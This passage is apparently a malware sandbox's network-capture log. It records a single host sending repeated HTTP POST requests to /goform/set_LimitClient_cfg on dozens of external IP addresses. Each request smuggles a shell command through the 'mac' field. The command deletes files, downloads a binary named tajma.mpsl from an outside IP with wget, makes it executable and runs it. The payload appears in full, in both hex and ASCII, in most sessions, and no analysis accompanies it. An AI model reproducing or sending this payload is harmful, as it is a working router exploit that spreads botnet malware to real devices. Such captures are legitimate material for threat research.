                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1311192.168.2.234162041.181.239.2138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.369683981 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1312192.168.2.235745282.30.59.398080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370090008 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1313192.168.2.234673897.184.109.1488080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370122910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1314192.168.2.233584025.9.56.18080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370132923 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1315192.168.2.2345366201.9.183.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370155096 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1316192.168.2.2345722171.211.191.1918080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370209932 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1317192.168.2.2336502163.138.189.468080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370250940 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1318192.168.2.234957082.211.220.618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370260000 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1319192.168.2.2351744194.152.225.218080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370280981 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1320192.168.2.2340206145.217.208.1168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370307922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1321192.168.2.2351194211.176.38.158080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370311022 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1322192.168.2.2353512123.83.165.58080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370333910 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1323192.168.2.234844679.253.44.508080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370352983 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1324192.168.2.2336842167.21.41.1938080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370373011 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1325192.168.2.2338874113.252.131.968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370378017 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1326192.168.2.235865617.254.59.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370414019 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1327192.168.2.2333700114.234.210.408080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370450020 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1328192.168.2.235171412.89.110.2078080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370459080 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1329192.168.2.233629280.77.179.428080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370491982 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1330192.168.2.235961853.31.77.618080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370510101 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1331192.168.2.2336842112.250.68.1658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370527029 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1332192.168.2.2345914196.171.49.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.370546103 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1333192.168.2.235998412.120.137.168080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:10.371001959 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
